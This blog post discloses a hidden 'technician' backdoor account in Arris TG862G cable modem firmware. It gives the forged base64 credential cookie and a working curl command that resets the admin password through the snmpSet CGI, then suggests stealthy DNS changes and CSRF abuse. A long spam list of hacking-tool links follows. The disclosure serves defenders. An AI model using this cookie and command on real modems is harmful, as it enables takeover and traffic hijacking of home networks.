Sunday, August 30, 2020

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related posts
  1. Pentest Tools Apk
  2. Pentest Tools Online
  3. Pentest Tools Android
  4. Hacker Tools Mac
  5. Hacking Tools For Windows
  6. Hacker Tools 2020
  7. Github Hacking Tools
  8. Hack Tools Mac
  9. Tools 4 Hack
  10. Hacker Tools List
  11. Pentest Tools For Windows
  12. Hack Tools Github
  13. Pentest Tools Kali Linux
  14. New Hack Tools
  15. Physical Pentest Tools
  16. Hacking Tools Kit
  17. Game Hacking
  18. Physical Pentest Tools
  19. Pentest Reporting Tools
  20. Hacker Tools For Mac
  21. Best Hacking Tools 2019
  22. Hacker Tools 2020
  23. Hacking Tools 2020
  24. Hack Tools For Games
  25. Usb Pentest Tools
  26. Pentest Tools Github
  27. Hack Tool Apk No Root
  28. Game Hacking
  29. How To Make Hacking Tools
  30. Pentest Tools Open Source
  31. Tools For Hacker
  32. Hack Tools Pc
  33. Hacker Tools Windows
  34. Hackrf Tools
  35. Hacker Tools
  36. Pentest Tools For Android
  37. Hacker Tools Apk Download
  38. Hacking Tools Name
  39. Pentest Tools Bluekeep
  40. Free Pentest Tools For Windows
  41. Pentest Tools Alternative
  42. Wifi Hacker Tools For Windows
  43. Pentest Tools Website
  44. Hacking Tools For Mac
  45. Hacking Tools Download
  46. Pentest Tools Tcp Port Scanner
  47. Pentest Tools Website
  48. Hacker Tools Free Download
  49. Hacker Tools For Mac
  50. Pentest Tools Find Subdomains
  51. Pentest Tools List
  52. Hacking App
  53. Pentest Tools Github
  54. Hacking Tools And Software
  55. Hacking Tools Name
  56. Hacking Tools Windows 10
  57. Hacking Tools 2020
  58. Pentest Tools Website Vulnerability
  59. Hacker Tools Apk
  60. Pentest Tools Online
  61. Pentest Tools Framework
  62. Hack Tools Download
  63. Hacking Tools For Kali Linux
  64. Tools 4 Hack
  65. Termux Hacking Tools 2019
  66. Hacking Tools For Kali Linux
  67. Hacking Tools For Mac
  68. Pentest Recon Tools
  69. Hack Tools Mac
  70. Hacker Tools Github
  71. Hacker Tools Apk Download
  72. Tools For Hacker
  73. Hack Tools For Windows
  74. Hacking Tools Name
  75. How To Install Pentest Tools In Ubuntu
  76. Hack Tools Pc
  77. Hack Tools
  78. Pentest Tools Android
  79. Kik Hack Tools
  80. Hak5 Tools
  81. Hacker Tools For Pc
  82. Termux Hacking Tools 2019
  83. Hack Apps
  84. Hack Tools For Games
  85. Hackers Toolbox
  86. Game Hacking
  87. Hack Website Online Tool
  88. Hacker Tool Kit
  89. Tools For Hacker
  90. Hacker Tools Windows
  91. Pentest Box Tools Download
  92. Hacker Search Tools
  93. Hacker Tools For Mac
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)